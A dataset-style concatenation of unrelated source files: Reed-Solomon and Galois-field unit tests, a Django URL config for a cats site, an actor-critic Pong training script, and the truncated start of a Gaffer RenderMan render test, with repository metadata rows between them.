self.assertEqual( list(g[n-k]) , [1, 128, 13, 69, 36, 145, 199, 165, 30] )
def test_prime_poly_build(self):
'''Try if the prime polynomials finder works correctly for different GFs (ie, GF(2^6) to GF(2^10)) and with different generators'''
params = {"count": 7,
"c_exp": [6, 7, 7, 8, 8, 9, 10],
"generator": [2, 2, 3, 2, 3, 2, 2],
"expected": [
[67, 91, 97, 103, 109, 115],
[131, 137, 143, 145, 157, 167, 171, 185, 191, 193, 203, 211, 213, 229, 239, 241, 247, 253],
[131, 137, 143, 145, 157, 167, 171, 185, 191, 193, 203, 211, 213, 229, 239, 241, 247, 253],
[285, 299, 301, 333, 351, 355, 357, 361, 369, 391, 397, 425, 451, 463, 487, 501],
[283, 313, 319, 333, 351, 355, 357, 361, 375, 397, 415, 419, 425, 451, 501, 505],
[529, 539, 545, 557, 563, 601, 607, 617, 623, 631, 637, 647, 661, 675, 677, 687, 695, 701, 719, 721, 731, 757, 761, 787, 789, 799, 803, 817, 827, 847, 859, 865, 875, 877, 883, 895, 901, 911, 949, 953, 967, 971, 973, 981, 985, 995, 1001, 1019],
[1033, 1051, 1063, 1069, 1125, 1135, 1153, 1163, 1221, 1239, 1255, 1267, 1279, 1293, 1305, 1315, 1329, 1341, 1347, 1367, 1387, 1413, 1423, 1431, 1441, 1479, 1509, 1527, 1531, 1555, 1557, 1573, 1591, 1603, 1615, 1627, 1657, 1663, 1673, 1717, 1729, 1747, 1759, 1789, 1815, 1821, 1825, 1849, 1863, 1869, 1877, 1881, 1891, 1917, 1933, 1939, 1969, 2011, 2035, 2041]
]
}
for i in xrange(params['count']):
self.assertEqual( find_prime_polys(generator=params['generator'][i], c_exp=params['c_exp'][i]) , params["expected"][i] )
def test_init_tables(self):
'''Try if the look up table generator (galois field generator) works correctly for different parameters'''
params = [
[0x11d, 2, 8],
[0x11b, 3, 8],
[0xfd, 3, 7]
]
expected = [[[0, 0, 1, 25, 2, 50, 26, 198, 3, 223, 51, 238, 27, 104, 199, 75, 4, 100, 224, 14, 52, 141, 239, 129, 28, 193, 105, 248, 200, 8, 76, 113, 5, 138, 101, 47, 225, 36, 15, 33, 53, 147, 142, 218, 240, 18, 130, 69, 29, 181, 194, 125, 106, 39, 249, 185, 201, 154, 9, 120, 77, 228, 114, 166, 6, 191, 139, 98, 102, 221, 48, 253, 226, 152, 37, 179, 16, 145, 34, 136, 54, 208, 148, 206, 143, 150, 219, 189, 241, 210, 19, 92, 131, 56, 70, 64, 30, 66, 182, 163, 195, 72, 126, 110, 107, 58, 40, 84, 250, 133, 186, 61, 202, 94, 155, 159, 10, 21, 121, 43, 78, 212, 229, 172, 115, 243, 167, 87, 7, 112, 192, 247, 140, 128, 99, 13, 103, 74, 222, 237, 49, 197, 254, 24, 227, 165, 153, 119, 38, 184, 180, 124, 17, 68, 146, 217, 35, 32, 137, 46, 55, 63, 209, 91, 149, 188, 207, 205, 144, 135, 151, 178, 220, 252, 190, 97, 242, 86, 211, 171, 20, 42, 93, 158, 132, 60, 57, 83, 71, 109, 65, 162, 31, 45, 67, 216, 183, 123, 164, 118, 196, 23, 73, 236, 127, 12, 111, 246, 108, 161, 59, 82, 41, 157, 85, 170, 251, 96, 134, 177, 187, 204, 62, 90, 203, 89, 95, 176, 156, 169, 160, 81, 11, 245, 22, 235, 122, 117, 44, 215, 79, 174, 213, 233, 230, 231, 173, 232, 116, 214, 244, 234, 168, 80, 88, 175], [1, 2, 4, 8, 16, 32, 64, 128, 29, 58, 116, 232, 205, 135, 19, 38, 76, 152, 45, 90, 180, 117, 234, 201, 143, 3, 6, 12, 24, 48, 96, 192, 157, 39, 78, 156, 37, 74, 148, 53, 106, 212, 181, 119, 238, 193, 159, 35, 70, 140, 5, 10, 20, 40, 80, 160, 93, 186, 105, 210, 185, 111, 222, 161, 95, 190, 97, 194, 153, 47, 94, 188, 101, 202, 137, 15, 30, 60, 120, 240, 253, 231, 211, 187, 107, 214, 177, 127, 254, 225, 223, 163, 91, 182, 113, 226, 217, 175, 67, 134, 17, 34, 68, 136, 13, 26, 52, 104, 208, 189, 103, 206, 129, 31, 62, 124, 248, 237, 199, 147, 59, 118, 236, 197, 151, 51, 102, 204, 133, 23, 46, 92, 184, 109, 218, 169, 79, 158, 33, 66, 132, 21, 42, 84, 168, 77, 154, 41, 82, 164, 85, 170, 73, 146, 57, 114, 228, 213, 183, 115, 230, 209, 191, 99, 198, 145, 63, 126, 252, 229, 215, 179, 123, 246, 241, 255, 227, 219, 171, 75, 150, 49, 98, 196, 149, 55, 110, 220, 165, 87, 174, 65, 130, 25, 50, 100, 200, 141, 7, 14, 28, 56, 112, 224, 221, 167, 83, 166, 81, 162, 89, 178, 121, 242, 249, 239, 195, 155, 43, 86, 172, 69, 138, 9, 18, 36, 72, 144, 61, 122, 244, 245, 247, 243, 251, 235, 203, 139, 11, 22, 44, 88, 176, 125, 250, 233, 207, 131, 27, 54, 108, 216, 173, 71, 142, 1, 2, 4, 8, 16, 32, 64, 128, 29, 58, 116, 232, 205, 135, 19, 38, 76, 152, 45, 90, 180, 117, 234, 201, 143, 3, 6, 12, 24, 48, 96, 192, 157, 39, 78, 156, 37, 74, 148, 53, 106, 212, 181, 119, 238, 193, 159, 35, 70, 140, 5, 10, 20, 40, 80, 160, 93, 186, 105, 210, 185, 111, 222, 161, 95, 190, 97, 194, 153, 47, 94, 188, 101, 202, 137, 15, 30, 60, 120, 240, 253, 231, 211, 187, 107, 214, 177, 127, 254, 225, 223, 163, 91, 182, 113, 226, 217, 175, 67, 134, 17, 34, 68, 136, 13, 26, 52, 104, 208, 189, 103, 206, 129, 31, 62, 124, 248, 237, 199, 147, 59, 118, 236, 197, 151, 51, 102, 204, 133, 23, 46, 92, 184, 109, 218, 169, 79, 158, 33, 66, 132, 21, 42, 84, 168, 77, 154, 41, 82, 164, 85, 170, 73, 146, 57, 114, 228, 213, 183, 115, 230, 209, 191, 99, 198, 145, 63, 126, 252, 229, 215, 179, 123, 246, 241, 255, 227, 219, 171, 75, 150, 49, 98, 196, 149, 55, 110, 220, 165, 87, 174, 65, 130, 25, 50, 100, 200, 141, 7, 14, 28, 56, 112, 224, 221, 167, 83, 166, 81, 162, 89, 178, 121, 242, 249, 239, 195, 155, 43, 86, 172, 69, 138, 9, 18, 36, 72, 144, 61, 122, 244, 245, 247, 243, 251, 235, 203, 139, 11, 22, 44, 88, 176, 125, 250, 233, 207, 131, 27, 54, 108, 216, 173, 71, 142]], [[0, 0, 25, 1, 50, 2, 26, 198, 75, 
199, 27, 104, 51, 238, 223, 3, 100, 4, 224, 14, 52, 141, 129, 239, 76, 113, 8, 200, 248, 105, 28, 193, 125, 194, 29, 181, 249, 185, 39, 106, 77, 228, 166, 114, 154, 201, 9, 120, 101, 47, 138, 5, 33, 15, 225, 36, 18, 240, 130, 69, 53, 147, 218, 142, 150, 143, 219, 189, 54, 208, 206, 148, 19, 92, 210, 241, 64, 70, 131, 56, 102, 221, 253, 48, 191, 6, 139, 98, 179, 37, 226, 152, 34, 136, 145, 16, 126, 110, 72, 195, 163, 182, 30, 66, 58, 107, 40, 84, 250, 133, 61, 186, 43, 121, 10, 21, 155, 159, 94, 202, 78, 212, 172, 229, 243, 115, 167, 87, 175, 88, 168, 80, 244, 234, 214, 116, 79, 174, 233, 213, 231, 230, 173, 232, 44, 215, 117, 122, 235, 22, 11, 245, 89, 203, 95, 176, 156, 169, 81, 160, 127, 12, 246, 111, 23, 196, 73, 236, 216, 67, 31, 45, 164, 118, 123, 183, 204, 187, 62, 90, 251, 96, 177, 134, 59, 82, 161, 108, 170, 85, 41, 157, 151, 178, 135, 144, 97, 190, 220, 252, 188, 149, 207, 205, 55, 63, 91, 209, 83, 57, 132, 60, 65, 162, 109, 71, 20, 42, 158, 93, 86, 242, 211, 171, 68, 17, 146, 217, 35, 32, 46, 137, 180, 124, 184, 38, 119, 153, 227, 165, 103, 74, 237, 222, 197, 49, 254, 24, 13, 99, 140, 128, 192, 247, 112, 7], [1, 3, 5, 15, 17, 51, 85, 255, 26, 46, 114, 150, 161, 248, 19, 53, 95, 225, 56, 72, 216, 115, 149, 164, 247, 2, 6, 10, 30, 34, 102, 170, 229, 52, 92, 228, 55, 89, 235, 38, 106, 190, 217, 112, 144, 171, 230, 49, 83, 245, 4, 12, 20, 60, 68, 204, 79, 209, 104, 184, 211, 110, 178, 205, 76, 212, 103, 169, 224, 59, 77, 215, 98, 166, 241, 8, 24, 40, 120, 136, 131, 158, 185, 208, 107, 189, 220, 127, 129, 152, 179, 206, 73, 219, 118, 154, 181, 196, 87, 249, 16, 48, 80, 240, 11, 29, 39, 105, 187, 214, 97, 163, 254, 25, 43, 125, 135, 146, 173, 236, 47, 113, 147, 174, 233, 32, 96, 160, 251, 22, 58, 78, 210, 109, 183, 194, 93, 231, 50, 86, 250, 21, 63, 65, 195, 94, 226, 61, 71, 201, 64, 192, 91, 237, 44, 116, 156, 191, 218, 117, 159, 186, 213, 100, 172, 239, 42, 126, 130, 157, 188, 223, 122, 142, 137, 128, 155, 182, 193, 88, 232, 35, 101, 175, 234, 37, 111, 177, 200, 67, 197, 84, 252, 31, 33, 99, 165, 244, 7, 9, 27, 45, 119, 153, 176, 203, 70, 202, 69, 207, 74, 222, 121, 139, 134, 145, 168, 227, 62, 66, 198, 81, 243, 14, 18, 54, 90, 238, 41, 123, 141, 140, 143, 138, 133, 148, 167, 242, 13, 23, 57, 75, 221, 124, 132, 151, 162, 253, 28, 36, 108, 180, 199, 82, 246, 1, 3, 5, 15, 17, 51, 85, 255, 26, 46, 114, 150, 161, 248, 19, 53, 95, 225, 56, 72, 216, 115, 149, 164, 247, 2, 6, 10, 30, 34, 102, 170, 229, 52, 92, 228, 55, 89, 235, 38, 106, 190, 217, 112, 144, 171, 230, 49, 83, 245, 4, 12, 20, 60, 68, 204, 79, 209, 104, 184, 211, 110, 178, 205, 76, 212, 103, 169, 224, 59, 77, 215, 98, 166, 241, 8, 24, 40, 120, 136, 131, 158, 185, 208, 107, 189, 220, 127, 129, 152, 179, 206, 73, 219, 118, 154, 181, 196, 87, 249, 16, 48, 80, 240, 11, 29, 39, 105, 187, 214, 97, 163, 254, 25, 43, 125, 135, 146, 173, 236, 47, 113, 147, 174, 233, 32, 96, 160, 251, 22, 58, 78, 210, 109, 183, 194, 93, 231, 50, 86, 250, 21, 63, 65, 195, 94, 226, 61, 71, 201, 64, 192, 91, 237, 44, 116, 156, 191, 218, 117, 159, 186, 213, 100, 172, 239, 42, 126, 130, 157, 188, 223, 122, 142, 137, 128, 155, 182, 193, 88, 232, 35, 101, 175, 234, 37, 111, 177, 200, 67, 197, 84, 252, 31, 33, 99, 165, 244, 7, 9, 27, 45, 119, 153, 176, 203, 70, 202, 69, 207, 74, 222, 121, 139, 134, 145, 168, 227, 62, 66, 198, 81, 243, 14, 18, 54, 90, 238, 41, 123, 141, 140, 143, 138, 133, 148, 167, 242, 13, 23, 57, 75, 221, 124, 132, 151, 162, 253, 28, 36, 108, 180, 199, 82, 246]], [[0, 0, 7, 1, 14, 2, 8, 56, 21, 57, 9, 90, 15, 31, 63, 3, 28, 4, 64, 67, 16, 112, 
97, 32, 22, 47, 38, 58, 70, 91, 10, 108, 35, 109, 11, 87, 71, 79, 74, 92, 23, 82, 119, 48, 104, 59, 39, 100, 29, 19, 54, 5, 45, 68, 65, 95, 77, 33, 98, 117, 17, 43, 115, 113, 42, 114, 116, 76, 18, 53, 94, 44, 78, 73, 86, 34, 81, 118, 99, 103, 30, 62, 89, 20, 126, 6, 55, 13, 111, 96, 66, 27, 46, 37, 107, 69, 36, 106, 26, 110, 61, 88, 12, 125, 52, 93, 75, 41, 72, 85, 102, 80, 84, 101, 40, 51, 105, 25, 124, 60, 24, 123, 50, 83, 122, 49, 120, 121], [1, 3, 5, 15, 17, 51, 85, 2, 6, 10, 30, 34, 102, 87, 4, 12, 20, 60, 68, 49, 83, 8, 24, 40, 120, 117, 98, 91, 16, 48, 80, 13, 23, 57, 75, 32, 96, 93, 26, 46, 114, 107, 64, 61, 71, 52, 92, 25, 43, 125, 122, 115, 104, 69, 50, 86, 7, 9, 27, 45, 119, 100, 81, 14, 18, 54, 90, 19, 53, 95, 28, 36, 108, 73, 38, 106, 67, 56, 72, 37, 111, 76, 41, 123, 112, 109, 74, 35, 101, 82, 11, 29, 39, 105, 70, 55, 89, 22, 58, 78, 47, 113, 110, 79, 44, 116, 97, 94, 31, 33, 99, 88, 21, 63, 65, 62, 66, 59, 77, 42, 126, 127, 124, 121, 118, 103, 84, 1, 3, 5, 15, 17, 51, 85, 2, 6, 10, 30, 34, 102, 87, 4, 12, 20, 60, 68, 49, 83, 8, 24, 40, 120, 117, 98, 91, 16, 48, 80, 13, 23, 57, 75, 32, 96, 93, 26, 46, 114, 107, 64, 61, 71, 52, 92, 25, 43, 125, 122, 115, 104, 69, 50, 86, 7, 9, 27, 45, 119, 100, 81, 14, 18, 54, 90, 19, 53, 95, 28, 36, 108, 73, 38, 106, 67, 56, 72, 37, 111, 76, 41, 123, 112, 109, 74, 35, 101, 82, 11, 29, 39, 105, 70, 55, 89, 22, 58, 78, 47, 113, 110, 79, 44, 116, 97, 94, 31, 33, 99, 88, 21, 63, 65, 62, 66, 59, 77, 42, 126, 127, 124, 121, 118, 103, 84]]]
for i in xrange(len(params)):
p = params[i]
expected_log_t, expected_exp_t = expected[i]
log_t, exp_t = init_tables(prim=p[0], generator=p[1], c_exp=p[2])
self.assertEqual( list(log_t) , expected_log_t )
self.assertEqual( list(exp_t) , expected_exp_t )
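# Hedged note on the tables above (not part of the original test): for non-zero a and b
# the LUT multiply in the module under test reduces to
#     gf_mul(a, b) == exp_t[log_t[a] + log_t[b]]
# which needs no explicit modulo because exp_t is stored twice over, as the repeated
# second half of the expected exponent tables above shows.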
class cTestGFArithmetics(unittest.TestCase):
'''Test Galois Field arithmetics'''
def test_multiply_nolut(self):
'''Try to multiply without look-up tables (necessary to build the look-up tables!)'''
a = 30
b = 19
generator=2
prim=0x11d
# Compare the LUT multiplication and noLUT
init_tables(prim=prim, generator=generator)
self.assertEqual(gf_mul(a, b), gf_mult_noLUT(a, b, prim=prim))
# More Galois Field multiplications
self.assertEqual( gf_mult_noLUT(5, 6, prim=0x11b, field_charac_full=256) , 30 )
self.assertEqual( gf_mult_noLUT(3, 125, prim=0x11b, field_charac_full=256) , 135 )
self.assertEqual( gf_mult_noLUT(2, 200, prim=0x11d, field_charac_full=256) , 141 )
self.assertEqual( gf_mult_noLUT_slow(2, 200, prim=0x11d) , 141 )
# Multiplications in GF(2^7)
self.assertEqual( gf_mult_noLUT(3, 125, prim=0xfd, field_charac_full=128) , 122 )
# Multiplications outside of the finite field (we revert to standard integer multiplications just to see if it works)
self.assertEqual( gf_mult_noLUT(3, 125, prim=0, carryless=False) , 375 )
self.assertEqual( gf_mult_noLUT_slow(4, 125, prim=0) , 500 ) # the second method, just to check that everything's alright
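# Hedged sketch (not part of the original tests): the no-LUT multiply exercised above can
# be reproduced with plain integer bit operations; prim and field_charac_full mirror the
# GF(2^8) defaults used in this file.
#
#     def _cl_mult_sketch(x, y, prim=0x11d, field_charac_full=256):
#         r = 0
#         while y:
#             if y & 1:
#                 r ^= x            # addition in GF(2) is XOR
#             y >>= 1
#             x <<= 1
#             if x & field_charac_full:
#                 x ^= prim         # reduce modulo the primitive polynomial
#         return r
#
#     _cl_mult_sketch(2, 200)  # -> 141, matching gf_mult_noLUT(2, 200, prim=0x11d) above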
class cTestRSCodecUniversalCrossValidation(unittest.TestCase):
'''Ultimate set of tests of a full set of different parameters for encoding and decoding. If this passes, the codec is universal and can correctly interface with any other RS codec!'''
def test_main(self):
def cartesian_product_dict_items(dicts):
return (dict(izip(dicts, x)) for x in itertools.product(*dicts.values()))
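# Hedged example of what the helper above yields (keys and values are illustrative only;
# ordering follows dict insertion order on Python 3.7+):
#     list(cartesian_product_dict_items({"a": [1, 2], "b": ["x"]}))
#     -> [{"a": 1, "b": "x"}, {"a": 2, "b": "x"}]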
debugg = False # if one or more tests don't pass, you can set this flag to True to get verbose debugging output
orig_mes = bytearray("hello world", "latin1")
n = len(orig_mes)*2
k = len(orig_mes)
nsym = n-k
istart = 0
params = {"count": 5,
"fcr": [120, 0, 1, 1, 1],
"prim": [0x187, 0x11d, 0x11b, 0xfd, 0xfd],
"generator": [2, 2, 3, 3, 2],
"c_exponent": [8, 8, 8, 7, 7],
}
cases = {
"errmode": [1, 2, 3, 4],
"erratasnb_errorsnb_onlyeras": [[8, 3, False], [6, 5, False], [5, 5, False], [11, 0, True], [11, 0, False], [0,0, False]], # errata number (errors+erasures), erasures number and only_erasures: the last item is the value for only_erasures (True/False)
}
############################
results_br = []
results_rs = []
it = 0
for p in xrange(params["count"]):
fcr = params["fcr"][p]
prim = params["prim"][p]
generator = params["generator"][p]
c_exponent = params["c_exponent"][p]
for case in cartesian_product_dict_items(cases):
errmode = case["errmode"]
erratanb = case["erratasnb_errorsnb_onlyeras"][0]
errnb = case["erratasnb_errorsnb_onlyeras"][1]
only_erasures = case["erratasnb_errorsnb_onlyeras"][2]
it += 1
if debugg:
print("it ", it)
print("param", p)
print(case)
# REEDSOLO
# Init the RS codec
init_tables(generator=generator, prim=prim, c_exp=c_exponent)
g = rs_generator_poly_all(n, fcr=fcr, generator=generator)
# Encode the message
rmesecc = rs_encode_msg(orig_mes, n-k, gen=g[n-k])
rmesecc_orig = rmesecc[:] # make a copy of the original message to check later if fully corrected (because the syndrome may be wrong sometimes)
# Tamper the message
if erratanb > 0:
if errmode == 1:
sl = slice(istart, istart+erratanb)
elif errmode == 2:
sl = slice(-istart-erratanb-(n-k), -(n-k))
elif errmode == 3:
sl = slice(-istart-erratanb-1, -1)
elif errmode == 4:
sl = slice(-istart-erratanb, None)
if debugg:
print("Removed slice:", list(rmesecc[sl]), rmesecc[sl])
rmesecc[sl] = [0] * erratanb
# Generate the erasures positions (if any)
erase_pos = [x for x in xrange(len(rmesecc)) if rmesecc[x] == 0]
if errnb > 0: erase_pos = erase_pos[:-errnb] # remove the error positions (they must not be known, by definition)
if debugg:
print("erase_pos", erase_pos)
print("coef_pos", [len(rmesecc) - 1 - pos for pos in erase_pos])
print("Errata total: ", erratanb-errnb + errnb*2, " -- Correctable? ", (erratanb-errnb + errnb*2 <= nsym))
# Decoding the corrupted codeword
# -- Forney syndrome method
try:
rmes, recc = rs_correct_msg(rmesecc, n-k, fcr=fcr, generator=generator, erase_pos=erase_pos, only_erasures=only_erasures)
results_br.append( rs_check(rmes + recc, n-k, fcr=fcr, generator=generator) ) # check if correct by syndrome analysis (can be wrong)
results_br.append( rmesecc_orig == (rmes+recc) ) # check if correct by comparing to the original message (always correct)
if debugg and (not rs_check(rmes + recc, n-k, fcr=fcr, generator=generator) or not (rmesecc_orig == (rmes+recc))): raise ReedSolomonError("False!!!!!")
except ReedSolomonError as exc:
results_br.append(False)
results_br.append(False)
if debugg:
print("====")
print("ERROR! Details:")
print("param", p)
print(case)
print(erase_pos)
print("original_msg", rmesecc_orig)
print("tampered_msg", rmesecc)
print("decoded_msg", rmes+recc)
print("checks: ", rs_check(rmes + recc, n-k, fcr=fcr, generator=generator), rmesecc_orig == (rmes+recc))
print("====")
raise exc
# -- Without Forney syndrome method
try:
mes, ecc = rs_correct_msg_nofsynd(rmesecc, n-k, fcr=fcr, generator=generator, erase_pos=erase_pos, only_erasures=only_erasures)
results_br.append( rs_check(mes + ecc, n-k, fcr=fcr, generator=generator) ) # check the no-Forney decode, not the previous one
results_br.append( rmesecc_orig == (mes+ecc) )
except ReedSolomonError as exc:
results_br.append(False)
results_br.append(False)
if debugg: print("-----")
self.assertTrue(results_br.count(True) == len(results_br))
if __name__ == "__main__":
unittest.main()
| 75.183486
| 8,627
| 0.537116
|
56f9860d9c2ec3b22735c1efd0b5755482676a33
| 430
|
py
|
Python
|
cats/urls.py
|
bmuha1/companion_cats
|
9e1141757c7d67c1e4bf3fd3bbe706e4d27fef7b
|
[
"MIT"
] | 1
|
2020-05-22T23:52:08.000Z
|
2020-05-22T23:52:08.000Z
|
cats/urls.py
|
bmuha1/companion_cats
|
9e1141757c7d67c1e4bf3fd3bbe706e4d27fef7b
|
[
"MIT"
] | 5
|
2021-03-30T12:50:19.000Z
|
2021-09-22T18:40:59.000Z
|
cats/urls.py
|
bmuha1/companion_cats
|
9e1141757c7d67c1e4bf3fd3bbe706e4d27fef7b
|
[
"MIT"
] | null | null | null |
from django.urls import path, re_path
from . import views
urlpatterns = [
path('', views.home, name='cats-home'),
path('about/', views.about, name='cats-about'),
path('all/', views.all, name='cats-all'),
path('find/', views.find, name='cats-find'),
path('cat/<int:cat_id>', views.cat, name='cats-cat'),
# path('random/', views.random, name='cats-random'),
# path('add/', views.add, name='cats-add')
]
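# Hedged usage note (not part of the original file): with the names above registered,
# views and templates can resolve URLs by name, e.g.
#     from django.urls import reverse
#     reverse('cats-cat', args=[3])   # -> '/cat/3' when this URLconf is mounted at the root
# The actual prefix depends on how this module is included in the project's urls.py.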
| 33.076923
| 57
| 0.616279
|
32ee8f20b62034f8860a9ea28dd0333dd429df43
| 3,594
|
py
|
Python
|
HW4-3/ACAgent_play.py
|
b05611038/MLDS_2019SPRING
|
0591a1a6f461da0a02b9e1b83f37ad3579f36f4d
|
[
"MIT"
] | 3
|
2019-06-20T06:47:30.000Z
|
2021-11-05T03:16:37.000Z
|
HW4-3/ACAgent_play.py
|
b05611038/MLDS_2019SPRING
|
0591a1a6f461da0a02b9e1b83f37ad3579f36f4d
|
[
"MIT"
] | null | null | null |
HW4-3/ACAgent_play.py
|
b05611038/MLDS_2019SPRING
|
0591a1a6f461da0a02b9e1b83f37ad3579f36f4d
|
[
"MIT"
] | null | null | null |
import time
import argparse
from lib.utils import *
from lib.trainer import ACTrainer
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
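# Hedged usage sketch: str2bool is intended to be passed as an argparse "type", e.g.
#     parser.add_argument('--gray_scale', type=str2bool, default=True)
# so that "--gray_scale no" on the command line parses to False.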
def construct_observation_preprocess_dict(args):
preprocess_dict = {}
preprocess_dict['slice_scoreboard'] = args[0]
preprocess_dict['gray_scale'] = args[1]
preprocess_dict['minus_observation'] = args[2]
return preprocess_dict
def construct_reward_preprocess_dict(args):
preprocess_dict = {}
preprocess_dict['time_decay'] = args[0]
preprocess_dict['normalized'] = args[1]
return preprocess_dict
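# Hedged example of the dicts built above (flag order mirrors the calls in __main__ below):
#     construct_observation_preprocess_dict([True, True, True])
#     -> {'slice_scoreboard': True, 'gray_scale': True, 'minus_observation': True}
#     construct_reward_preprocess_dict([True, True])
#     -> {'time_decay': True, 'normalized': True}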
def init_parser(main):
parser = argparse.ArgumentParser()
parser.add_argument('model_type', type = str, help = 'Model architecture to choose. [baseline]')
parser.add_argument('model_name', type = str, help = 'Model name of the model.')
parser.add_argument('Algorithm', type = str, help = 'Implemented policy-gradient-based algorithm. [A2C_l1, ...; check README.md]')
parser.add_argument('device', type = int, help = 'Device to use for training. [-1 is CPU]')
parser.add_argument('--optimizer', type = str, default = 'Adam', help = 'The optimizer to use.')
parser.add_argument('--iterations', type = int, default = 10000, help = 'How many episodes to train your policy net.')
parser.add_argument('--episode_size', type = int, default = 4, help = 'How many games to play in an episode.')
parser.add_argument('--batch_size', type = int, default = 128, help = 'Batch size used by the dataloader.')
parser.add_argument('--checkpoint', type = int, default = 1000, help = 'The interval of saving a model checkpoint.')
parser.add_argument('--env', type = str, default = 'Pong-v0', help = 'The game that you want the actor-critic agent to play.')
parser.add_argument('--slice_scoreboard', type = str2bool, default = True,
help = 'Image preprocessing option; if true, the scoreboard part of the image is not fed into the model.')
parser.add_argument('--gray_scale', type = str2bool, default = True,
help = 'Image preprocessing option; if true, the input image is converted from RGB to grayscale.')
parser.add_argument('--minus_observation', type = str2bool, default = True,
help = 'Image preprocessing option; if true, the input image becomes the last state minus the current state.')
parser.add_argument('--reward_normalize', type = str2bool, default = True,
help = 'Reward processing option; if true, the reward is normalized per batch.')
parser.add_argument('--decay_by_time', type = str2bool, default = True,
help = 'Reward processing option; if true, the reward decays over time steps.')
opt = parser.parse_args()
print(opt)
return opt
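# Hedged invocation sketch (positional order follows the parser above; values illustrative):
#     python ACAgent_play.py baseline my_actor_critic A2C_l1 0 --iterations 5000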
if __name__ == '__main__':
start_time = time.time()
opt = init_parser(__name__)
observation_dict = construct_observation_preprocess_dict([opt.slice_scoreboard, opt.gray_scale, opt.minus_observation])
reward_dict = construct_reward_preprocess_dict([opt.decay_by_time, opt.reward_normalize])
trainer = ACTrainer(opt.model_type, opt.model_name, observation_dict, reward_dict, opt.device,
optimizer = opt.optimizer, policy = opt.Algorithm, env = opt.env)
trainer.play(opt.iterations, opt.episode_size, opt.batch_size, opt.checkpoint)
trainer.save_config(opt)
print('All process done, cause %s seconds.' % (time.time() - start_time))
| 48.567568
| 133
| 0.692543
|
703ee35d427936dc86bacf26b0b8254a9e4bffd7
| 25,886
|
py
|
Python
|
python/GafferRenderManTest/InteractiveRenderManRenderTest.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferRenderManTest/InteractiveRenderManRenderTest.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferRenderManTest/InteractiveRenderManRenderTest.py
|
dboogert/gaffer
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
[
"BSD-3-Clause"
] | null | null | null |
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import time
import os
import IECore
import Gaffer
import GafferImage
import GafferScene
import GafferRenderMan
import GafferRenderManTest
class InteractiveRenderManRenderTest( GafferRenderManTest.RenderManTestCase ) :
def __colorAtUV( self, image, uv ) :
e = IECore.ImagePrimitiveEvaluator( image )
r = e.createResult()
e.pointAtUV( uv, r )
return IECore.Color3f(
r.floatPrimVar( image["R"] ),
r.floatPrimVar( image["G"] ),
r.floatPrimVar( image["B"] ),
)
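# Hedged note on the helper above: it samples the render held in memory under a display
# "handle" at a normalised UV coordinate, e.g.
#     self.__colorAtUV( IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ), IECore.V2f( 0.5 ) )
# reads the colour at the centre of the image.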
def testLights( self ) :
s = Gaffer.ScriptNode()
s["l"] = GafferRenderMan.RenderManLight()
s["l"].loadShader( "pointlight" )
s["l"]["parameters"]["lightcolor"].setValue( IECore.Color3f( 1, 0.5, 0.25 ) )
s["l"]["transform"]["translate"]["z"].setValue( 1 )
s["p"] = GafferScene.Plane()
s["c"] = GafferScene.Camera()
s["c"]["transform"]["translate"]["z"].setValue( 1 )
s["g"] = GafferScene.Group()
s["g"]["in"].setInput( s["l"]["out"] )
s["g"]["in1"].setInput( s["p"]["out"] )
s["g"]["in2"].setInput( s["c"]["out"] )
s["s"] = GafferRenderMan.RenderManShader()
s["s"].loadShader( "matte" )
s["a"] = GafferScene.ShaderAssignment()
s["a"]["in"].setInput( s["g"]["out"] )
s["a"]["shader"].setInput( s["s"]["out"] )
s["d"] = GafferScene.Displays()
s["d"].addDisplay(
"beauty",
IECore.Display(
"test",
"ieDisplay",
"rgba",
{
"quantize" : IECore.FloatVectorData( [ 0, 0, 0, 0 ] ),
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelyPlane",
}
)
)
s["d"]["in"].setInput( s["a"]["out"] )
s["o"] = GafferScene.StandardOptions()
s["o"]["options"]["renderCamera"]["value"].setValue( "/group/camera" )
s["o"]["options"]["renderCamera"]["enabled"].setValue( True )
s["o"]["in"].setInput( s["d"]["out"] )
s["r"] = GafferRenderMan.InteractiveRenderManRender()
s["r"]["in"].setInput( s["o"]["out"] )
# start a render, give it time to finish, and check the output
s["r"]["state"].setValue( s["r"].State.Running )
time.sleep( 2 )
c = self.__colorAtUV(
IECore.ImageDisplayDriver.storedImage( "myLovelyPlane" ),
IECore.V2f( 0.5 ),
)
